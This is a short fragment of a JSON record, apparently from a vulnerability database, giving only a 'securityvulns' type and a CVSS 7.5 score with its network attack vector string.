"type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
